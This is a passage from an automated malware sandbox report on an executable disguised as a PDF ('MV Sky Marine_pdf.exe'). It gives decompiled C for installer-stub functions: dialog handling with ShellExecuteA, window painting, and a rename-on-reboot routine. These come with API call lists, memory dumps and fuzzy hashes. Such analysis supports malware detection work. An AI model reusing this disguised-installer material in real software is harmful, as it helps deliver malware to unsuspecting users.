                                                                                                    • Part of subcall function 004060B4: GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                    • Part of subcall function 004060B4: GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                  • lstrcatA.KERNEL32(1033,0079EDA0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079EDA0,00000000,00000003,C:\Users\user\AppData\Local\Temp\,?,"C:\Users\user\Desktop\MV Sky Marine_pdf.exe" ,00000000), ref: 004037E8
                                                                                                  • lstrlenA.KERNEL32(HfkcdoekxlzOjbt,?,?,?,HfkcdoekxlzOjbt,00000000,007A8400,1033,0079EDA0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079EDA0,00000000,00000003,C:\Users\user\AppData\Local\Temp\), ref: 0040385D
                                                                                                  • lstrcmpiA.KERNEL32(?,.exe,HfkcdoekxlzOjbt,?,?,?,HfkcdoekxlzOjbt,00000000,007A8400,1033,0079EDA0,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079EDA0,00000000), ref: 00403870
                                                                                                  • GetFileAttributesA.KERNEL32(HfkcdoekxlzOjbt), ref: 0040387B
                                                                                                  • LoadImageA.USER32 ref: 004038C4
                                                                                                    • Part of subcall function 00405C82: wsprintfA.USER32 ref: 00405C8F
                                                                                                  • RegisterClassA.USER32 ref: 0040390B
                                                                                                  • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 00403923
                                                                                                  • CreateWindowExA.USER32 ref: 0040395C
                                                                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403992
                                                                                                  • GetClassInfoA.USER32 ref: 004039BE
                                                                                                  • GetClassInfoA.USER32 ref: 004039CB
                                                                                                  • RegisterClassA.USER32 ref: 004039D4
                                                                                                  • DialogBoxParamA.USER32 ref: 004039F3
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                  • String ID: "C:\Users\user\Desktop\MV Sky Marine_pdf.exe" $.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$Control Panel\Desktop\ResourceLocale$HfkcdoekxlzOjbt$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                                                                  • API String ID: 1975747703-438579894
                                                                                                  • Opcode ID: eb4441e4377b0bf268c748af4bc558b8a08e83df4cbc82606365b058a02161bf
                                                                                                  • Instruction ID: 35a926fb0ff1dca2a59ab2be640b96e9f44767dc488af4120bbc7542c0b7b188
                                                                                                  • Opcode Fuzzy Hash: eb4441e4377b0bf268c748af4bc558b8a08e83df4cbc82606365b058a02161bf
                                                                                                  • Instruction Fuzzy Hash: 6161B3B16442406EE710BF659C45E3B3AACEB85749F40847FF945B22E2D77C9D01CA2E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00404128, Relevance: 40.5, APIs: 20, Strings: 3, Instructions: 204windowstringCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 93%
                                                                                                  			E00404128(struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, int _a16) {
				char* _v8;
				signed int _v12;
				void* _v16;
				struct HWND__* _t52;
				long _t86;
				int _t98;
				struct HWND__* _t99;
				signed int _t100;
				intOrPtr _t107;
				intOrPtr _t109;
				int _t110;
				signed int* _t112;
				signed int _t113;
				char* _t114;
				CHAR* _t115;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L11:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x79ed80 =  *0x79ed80 + 1;
							}
							L25:
							_t110 = _a16;
							L26:
							return E00404047(_a8, _a12, _t110);
						}
						_t52 = GetDlgItem(_a4, 0x3e8);
						_t110 = _a16;
						if( *((intOrPtr*)(_t110 + 8)) == 0x70b &&  *((intOrPtr*)(_t110 + 0xc)) == 0x201) {
							_t100 =  *((intOrPtr*)(_t110 + 0x1c));
							_t109 =  *((intOrPtr*)(_t110 + 0x18));
							_v12 = _t100;
							_v16 = _t109;
							_v8 = 0x7a1740;
							if(_t100 - _t109 < 0x800) {
								SendMessageA(_t52, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorA(0, 0x7f02));
								ShellExecuteA(_a4, "open", _v8, 0, 0, 1);
								SetCursor(LoadCursorA(0, 0x7f00));
								_t110 = _a16;
							}
						}
						if( *((intOrPtr*)(_t110 + 8)) != 0x700 ||  *((intOrPtr*)(_t110 + 0xc)) != 0x100) {
							goto L26;
						} else {
							if( *((intOrPtr*)(_t110 + 0x10)) == 0xd) {
								SendMessageA( *0x7a27a8, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t110 + 0x10)) == 0x1b) {
								SendMessageA( *0x7a27a8, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x79ed80 != 0) {
						goto L25;
					} else {
						_t112 =  *0x79e570 + 0x14;
						if(( *_t112 & 0x00000020) == 0) {
							goto L25;
						}
						 *_t112 =  *_t112 & 0xfffffffe | SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E00404002(SendMessageA(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E004043B3();
						goto L11;
					}
				}
				_t98 = _a16;
				_t113 =  *(_t98 + 0x30);
				if(_t113 < 0) {
					_t107 =  *0x7a1f7c; // 0x891203
					_t113 =  *(_t107 - 4 + _t113 * 4);
				}
				_push( *((intOrPtr*)(_t98 + 0x34)));
				_t114 = _t113 +  *0x7a27d8;
				_push(0x22);
				_a16 =  *_t114;
				_v12 = _v12 & 0x00000000;
				_t115 = _t114 + 1;
				_v16 = _t115;
				_v8 = E004040F4;
				E00403FE0(_a4);
				_push( *((intOrPtr*)(_t98 + 0x38)));
				_push(0x23);
				E00403FE0(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E00404002( !( *(_t98 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t98 + 0x14) & 0x00000001);
				_t99 = GetDlgItem(_a4, 0x3e8);
				E00404015(_t99);
				SendMessageA(_t99, 0x45b, 1, 0);
				_t86 =  *( *0x7a27b0 + 0x68);
				if(_t86 < 0) {
					_t86 = GetSysColor( ~_t86);
				}
				SendMessageA(_t99, 0x443, 0, _t86);
				SendMessageA(_t99, 0x445, 0, 0x4010000);
				 *0x79dd64 =  *0x79dd64 & 0x00000000;
				SendMessageA(_t99, 0x435, 0, lstrlenA(_t115));
				SendMessageA(_t99, 0x449, _a16,  &_v16);
				 *0x79ed80 =  *0x79ed80 & 0x00000000;
				return 0;
			}


















                                                                                                  0x00404138
                                                                                                  0x0040425e
                                                                                                  0x004042ba
                                                                                                  0x004042be
                                                                                                  0x00404395
                                                                                                  0x00404397
                                                                                                  0x00404397
                                                                                                  0x0040439d
                                                                                                  0x0040439d
                                                                                                  0x004043a0
                                                                                                  0x00000000
                                                                                                  0x004043a7
                                                                                                  0x004042cc
                                                                                                  0x004042ce
                                                                                                  0x004042d8
                                                                                                  0x004042e3
                                                                                                  0x004042e6
                                                                                                  0x004042e9
                                                                                                  0x004042f4
                                                                                                  0x004042f7
                                                                                                  0x004042fe
                                                                                                  0x0040430c
                                                                                                  0x00404324
                                                                                                  0x00404337
                                                                                                  0x00404347
                                                                                                  0x00404349
                                                                                                  0x00404349
                                                                                                  0x004042fe
                                                                                                  0x00404353
                                                                                                  0x00000000
                                                                                                  0x0040435e
                                                                                                  0x00404362
                                                                                                  0x00404373
                                                                                                  0x00404373
                                                                                                  0x00404379
                                                                                                  0x00404387
                                                                                                  0x00404387
                                                                                                  0x00000000
                                                                                                  0x0040438b
                                                                                                  0x00404353
                                                                                                  0x00404269
                                                                                                  0x00000000
                                                                                                  0x0040427d
                                                                                                  0x00404283
                                                                                                  0x00404289
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x004042ae
                                                                                                  0x004042b0
                                                                                                  0x004042b5
                                                                                                  0x00000000
                                                                                                  0x004042b5
                                                                                                  0x00404269
                                                                                                  0x0040413e
                                                                                                  0x00404141
                                                                                                  0x00404146
                                                                                                  0x00404148
                                                                                                  0x00404157
                                                                                                  0x00404157
                                                                                                  0x0040415e
                                                                                                  0x00404161
                                                                                                  0x00404163
                                                                                                  0x00404168
                                                                                                  0x00404171
                                                                                                  0x00404177
                                                                                                  0x00404183
                                                                                                  0x00404186
                                                                                                  0x0040418f
                                                                                                  0x00404194
                                                                                                  0x00404197
                                                                                                  0x0040419c
                                                                                                  0x004041b3
                                                                                                  0x004041ba
                                                                                                  0x004041cd
                                                                                                  0x004041d0
                                                                                                  0x004041e5
                                                                                                  0x004041ec
                                                                                                  0x004041f1
                                                                                                  0x004041f6
                                                                                                  0x004041f6
                                                                                                  0x00404205
                                                                                                  0x00404214
                                                                                                  0x00404216
                                                                                                  0x0040422c
                                                                                                  0x0040423b
                                                                                                  0x0040423d
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041B3
                                                                                                  • GetDlgItem.USER32 ref: 004041C7
                                                                                                  • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041E5
                                                                                                  • GetSysColor.USER32(?), ref: 004041F6
                                                                                                  • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404205
                                                                                                  • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404214
                                                                                                  • lstrlenA.KERNEL32(?), ref: 0040421E
                                                                                                  • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 0040422C
                                                                                                  • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 0040423B
                                                                                                  • GetDlgItem.USER32 ref: 0040429E
                                                                                                  • SendMessageA.USER32(00000000), ref: 004042A1
                                                                                                  • GetDlgItem.USER32 ref: 004042CC
                                                                                                  • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040430C
                                                                                                  • LoadCursorA.USER32 ref: 0040431B
                                                                                                  • SetCursor.USER32(00000000), ref: 00404324
                                                                                                  • ShellExecuteA.SHELL32(0000070B,open,007A1740,00000000,00000000,00000001), ref: 00404337
                                                                                                  • LoadCursorA.USER32 ref: 00404344
                                                                                                  • SetCursor.USER32(00000000), ref: 00404347
                                                                                                  • SendMessageA.USER32(00000111,00000001,00000000), ref: 00404373
                                                                                                  • SendMessageA.USER32(00000010,00000000,00000000), ref: 00404387
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                                                                  • String ID: HfkcdoekxlzOjbt$N$open
                                                                                                  • API String ID: 3615053054-4167511373
                                                                                                  • Opcode ID: d22ed51e52645bbda46709527d00024517d84b0f423467f554ab8d343295d58a
                                                                                                  • Instruction ID: f0cb6d18f97b8649cf6ac89defab68cba8f06c9b906ac7d17723c3c6284b924c
                                                                                                  • Opcode Fuzzy Hash: d22ed51e52645bbda46709527d00024517d84b0f423467f554ab8d343295d58a
                                                                                                  • Instruction Fuzzy Hash: 7B6192B1A40309BFEB109F60DC45F6A7B69FB84715F108026FB05BB2D1C7B8A9518F99
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00401000, Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 125COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 90%
                                                                                                  			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
				struct tagLOGBRUSH _v16;
				struct tagRECT _v32;
				struct tagPAINTSTRUCT _v96;
				struct HDC__* _t70;
				struct HBRUSH__* _t87;
				struct HFONT__* _t94;
				long _t102;
				signed int _t126;
				struct HDC__* _t128;
				intOrPtr _t130;

				if(_a8 == 0xf) {
					_t130 =  *0x7a27b0;
					_t70 = BeginPaint(_a4,  &_v96);
					_v16.lbStyle = _v16.lbStyle & 0x00000000;
					_a8 = _t70;
					GetClientRect(_a4,  &_v32);
					_t126 = _v32.bottom;
					_v32.bottom = _v32.bottom & 0x00000000;
					while(_v32.top < _t126) {
						_a12 = _t126 - _v32.top;
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
						_t87 = CreateBrushIndirect( &_v16);
						_v32.bottom = _v32.bottom + 4;
						_a16 = _t87;
						FillRect(_a8,  &_v32, _t87);
						DeleteObject(_a16);
						_v32.top = _v32.top + 4;
					}
					if( *(_t130 + 0x58) != 0xffffffff) {
						_t94 = CreateFontIndirectA( *(_t130 + 0x34));
						_a16 = _t94;
						if(_t94 != 0) {
							_t128 = _a8;
							_v32.left = 0x10;
							_v32.top = 8;
							SetBkMode(_t128, 1);
							SetTextColor(_t128,  *(_t130 + 0x58));
							_a8 = SelectObject(_t128, _a16);
							DrawTextA(_t128, 0x7a1fa0, 0xffffffff,  &_v32, 0x820);
							SelectObject(_t128, _a8);
							DeleteObject(_a16);
						}
					}
					EndPaint(_a4,  &_v96);
					return 0;
				}
				_t102 = _a16;
				if(_a8 == 0x46) {
					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
					 *((intOrPtr*)(_t102 + 4)) =  *0x7a27a8;
				}
				return DefWindowProcA(_a4, _a8, _a12, _t102);
			}













                                                                                                  0x0040100a
                                                                                                  0x00401039
                                                                                                  0x00401047
                                                                                                  0x0040104d
                                                                                                  0x00401051
                                                                                                  0x0040105b
                                                                                                  0x00401061
                                                                                                  0x00401064
                                                                                                  0x004010f3
                                                                                                  0x00401089
                                                                                                  0x0040108c
                                                                                                  0x004010a6
                                                                                                  0x004010bd
                                                                                                  0x004010cc
                                                                                                  0x004010cf
                                                                                                  0x004010d5
                                                                                                  0x004010d9
                                                                                                  0x004010e4
                                                                                                  0x004010ed
                                                                                                  0x004010ef
                                                                                                  0x004010ef
                                                                                                  0x00401100
                                                                                                  0x00401105
                                                                                                  0x0040110d
                                                                                                  0x00401110
                                                                                                  0x00401112
                                                                                                  0x00401118
                                                                                                  0x0040111f
                                                                                                  0x00401126
                                                                                                  0x00401130
                                                                                                  0x00401142
                                                                                                  0x00401156
                                                                                                  0x00401160
                                                                                                  0x00401165
                                                                                                  0x00401165
                                                                                                  0x00401110
                                                                                                  0x0040116e
                                                                                                  0x00000000
                                                                                                  0x00401178
                                                                                                  0x00401010
                                                                                                  0x00401013
                                                                                                  0x00401015
                                                                                                  0x0040101f
                                                                                                  0x0040101f
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                  • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                  • GetClientRect.USER32 ref: 0040105B
                                                                                                  • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                                                                  • FillRect.USER32 ref: 004010E4
                                                                                                  • DeleteObject.GDI32(?), ref: 004010ED
                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                                                                  • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                                                                  • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                                                                  • SelectObject.GDI32(00000000,?), ref: 00401140
                                                                                                  • DrawTextA.USER32(00000000,007A1FA0,000000FF,00000010,00000820), ref: 00401156
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                                                                  • DeleteObject.GDI32(?), ref: 00401165
                                                                                                  • EndPaint.USER32(?,?), ref: 0040116E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                  • String ID: F
                                                                                                  • API String ID: 941294808-1304234792
                                                                                                  • Opcode ID: 801c52bb82e7a0127a4a406d0340a402cf5ff0aaf0876ab62d5db8722a7a1795
                                                                                                  • Instruction ID: ae539154b4ab0852a88358bcfa6a2a72370d892ddcdfd4a8f95fd444cc6c7b46
                                                                                                  • Opcode Fuzzy Hash: 801c52bb82e7a0127a4a406d0340a402cf5ff0aaf0876ab62d5db8722a7a1795
                                                                                                  • Instruction Fuzzy Hash: 4241AC71804249AFCB058F94CD459BFBFB9FF45314F00802AF961AA2A0C738EA50DFA5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 00405A72, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 144filememoryCOMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 93%
                                                                                                  			E00405A72(void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t15;
				long _t16;
				int _t20;
				void* _t28;
				long _t29;
				intOrPtr* _t37;
				int _t43;
				void* _t44;
				long _t47;
				CHAR* _t49;
				void* _t51;
				void* _t53;
				intOrPtr* _t54;
				void* _t55;
				void* _t56;

				_t15 = E004060B4(2);
				_t49 =  *(_t55 + 0x18);
				if(_t15 != 0) {
					_t20 =  *_t15( *(_t55 + 0x1c), _t49, 5);
					if(_t20 != 0) {
						L16:
						 *0x7a2830 =  *0x7a2830 + 1;
						return _t20;
					}
				}
				 *0x7a0f30 = 0x4c554e;
				if(_t49 == 0) {
					L5:
					_t16 = GetShortPathNameA( *(_t55 + 0x1c), 0x7a09a8, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						_t43 = wsprintfA(0x7a05a8, "%s=%s\r\n", 0x7a0f30, 0x7a09a8);
						_t56 = _t55 + 0x10;
						E00405D46(_t43, 0x400, 0x7a09a8, 0x7a09a8,  *((intOrPtr*)( *0x7a27b0 + 0x128)));
						_t20 = E004059FB(0x7a09a8, 0xc0000000, 4);
						_t53 = _t20;
						 *(_t56 + 0x14) = _t53;
						if(_t53 == 0xffffffff) {
							goto L16;
						}
						_t47 = GetFileSize(_t53, 0);
						_t7 = _t43 + 0xa; // 0xa
						_t51 = GlobalAlloc(0x40, _t47 + _t7);
						if(_t51 == 0 || ReadFile(_t53, _t51, _t47, _t56 + 0x18, 0) == 0 || _t47 !=  *(_t56 + 0x18)) {
							L15:
							_t20 = CloseHandle(_t53);
							goto L16;
						} else {
							if(E00405970(_t51, "[Rename]\r\n") != 0) {
								_t28 = E00405970(_t26 + 0xa, 0x409404);
								if(_t28 == 0) {
									L13:
									_t29 = _t47;
									L14:
									E004059BC(_t51 + _t29, 0x7a05a8, _t43);
									SetFilePointer(_t53, 0, 0, 0);
									WriteFile(_t53, _t51, _t47 + _t43, _t56 + 0x18, 0);
									GlobalFree(_t51);
									goto L15;
								}
								_t37 = _t28 + 1;
								_t44 = _t51 + _t47;
								_t54 = _t37;
								if(_t37 >= _t44) {
									L21:
									_t53 =  *(_t56 + 0x14);
									_t29 = _t37 - _t51;
									goto L14;
								} else {
									goto L20;
								}
								do {
									L20:
									 *((char*)(_t43 + _t54)) =  *_t54;
									_t54 = _t54 + 1;
								} while (_t54 < _t44);
								goto L21;
							}
							E00405D24(_t51 + _t47, "[Rename]\r\n");
							_t47 = _t47 + 0xa;
							goto L13;
						}
					}
				} else {
					CloseHandle(E004059FB(_t49, 0, 1));
					_t16 = GetShortPathNameA(_t49, 0x7a0f30, 0x400);
					if(_t16 != 0 && _t16 <= 0x400) {
						goto L5;
					}
				}
				return _t16;
			}





















                                                                                                  0x00405a78
                                                                                                  0x00405a7f
                                                                                                  0x00405a83
                                                                                                  0x00405a8c
                                                                                                  0x00405a90
                                                                                                  0x00405bcf
                                                                                                  0x00405bcf
                                                                                                  0x00000000
                                                                                                  0x00405bcf
                                                                                                  0x00405a90
                                                                                                  0x00405a9c
                                                                                                  0x00405ab2
                                                                                                  0x00405ada
                                                                                                  0x00405ae5
                                                                                                  0x00405ae9
                                                                                                  0x00405b09
                                                                                                  0x00405b10
                                                                                                  0x00405b1a
                                                                                                  0x00405b27
                                                                                                  0x00405b2c
                                                                                                  0x00405b31
                                                                                                  0x00405b35
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405b44
                                                                                                  0x00405b46
                                                                                                  0x00405b53
                                                                                                  0x00405b57
                                                                                                  0x00405bc8
                                                                                                  0x00405bc9
                                                                                                  0x00000000
                                                                                                  0x00405b73
                                                                                                  0x00405b80
                                                                                                  0x00405be5
                                                                                                  0x00405bec
                                                                                                  0x00405b93
                                                                                                  0x00405b93
                                                                                                  0x00405b95
                                                                                                  0x00405b9e
                                                                                                  0x00405ba9
                                                                                                  0x00405bbb
                                                                                                  0x00405bc2
                                                                                                  0x00000000
                                                                                                  0x00405bc2
                                                                                                  0x00405bee
                                                                                                  0x00405bef
                                                                                                  0x00405bf4
                                                                                                  0x00405bf6
                                                                                                  0x00405c03
                                                                                                  0x00405c03
                                                                                                  0x00405c07
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405bf8
                                                                                                  0x00405bf8
                                                                                                  0x00405bfb
                                                                                                  0x00405bfe
                                                                                                  0x00405bff
                                                                                                  0x00000000
                                                                                                  0x00405bf8
                                                                                                  0x00405b8b
                                                                                                  0x00405b90
                                                                                                  0x00000000
                                                                                                  0x00405b90
                                                                                                  0x00405b57
                                                                                                  0x00405ab4
                                                                                                  0x00405abf
                                                                                                  0x00405ac8
                                                                                                  0x00405acc
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00405acc
                                                                                                  0x00405bd9

                                                                                                  APIs
                                                                                                    • Part of subcall function 004060B4: GetModuleHandleA.KERNEL32(?,?,?,004032D9,0000000D), ref: 004060C6
                                                                                                    • Part of subcall function 004060B4: GetProcAddress.KERNEL32(00000000,?), ref: 004060E1
                                                                                                  • CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000002,?,00000000,?,?,00405807,?,00000000,000000F1,?), ref: 00405ABF
                                                                                                  • GetShortPathNameA.KERNEL32 ref: 00405AC8
                                                                                                  • GetShortPathNameA.KERNEL32 ref: 00405AE5
                                                                                                  • wsprintfA.USER32 ref: 00405B03
                                                                                                  • GetFileSize.KERNEL32(00000000,00000000,007A09A8,C0000000,00000004,007A09A8,?,?,?,00000000,000000F1,?), ref: 00405B3E
                                                                                                  • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 00405B4D
                                                                                                  • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 00405B63
                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,007A05A8,00000000,-0000000A,00409404,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405BA9
                                                                                                  • WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 00405BBB
                                                                                                  • GlobalFree.KERNEL32 ref: 00405BC2
                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 00405BC9
                                                                                                    • Part of subcall function 00405970: lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405977
                                                                                                    • Part of subcall function 00405970: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405B7E,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004059A7
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.234376908.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.234373612.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234381555.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234385156.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234540013.000000000077A000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234560159.0000000000780000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234574024.0000000000784000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234578845.0000000000787000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234609664.00000000007A0000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234622345.00000000007A8000.00000004.00020000.sdmp Download File
                                                                                                  • Associated: 00000002.00000002.234636816.00000000007AB000.00000002.00020000.sdmp Download File
                                                                                                  Similarity
                                                                                                  • API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeModulePointerProcReadSizeWritewsprintf
                                                                                                  • String ID: %s=%s$[Rename]
                                                                                                  • API String ID: 3445103937-1727408572
                                                                                                  • Opcode ID: 1f2736941f5f4df1f680b04e7c0e89d6834b7e9bfe2f13e76cace8b15f9fd4f6
                                                                                                  • Instruction ID: 78907502291c0276e2930d03081e4e2226449f21389978f945135ad8005819bc
                                                                                                  • Opcode Fuzzy Hash: 1f2736941f5f4df1f680b04e7c0e89d6834b7e9bfe2f13e76cace8b15f9fd4f6
                                                                                                  • Instruction Fuzzy Hash: 7741F171604B057BD3206B619D49F6B3AACDF81715F100536FA41F62C2EA3CB8018EBE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Function 100013F0, Relevance: 22.8, APIs: 10, Strings: 3, Instructions: 83COMMON
                                                                                                  Download Yara Rule
                                                                                                  C-Code - Quality: 66%
                                                                                                  			E100013F0(signed int __ecx) {
				signed int _v8;
				void* _t16;
				signed int _t17;
				signed int _t18;
				signed int _t21;
				signed int _t26;
				signed int _t40;
				signed int _t42;
				void* _t44;
				void* _t45;

				_t39 = __ecx;
				_push(__ecx);
				if( *0x10003028 > 9) {
					0x10004b24->X = 0x14001e;
					SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
					_push("Game Draw");
					L2:
					E10001690();
					_t44 = _t44 + 4;
					__imp___getch();
					exit(0);
				}
				E10001140();
				0x10004b24->X = 0x12001e;
				SetConsoleCursorPosition(GetStdHandle(0xfffffff5), 0x10004b24->X);
				E10001690("Your Turn :> ", _t42);
				E10001750("%d",  &_v8);
				_t42 = _v8;
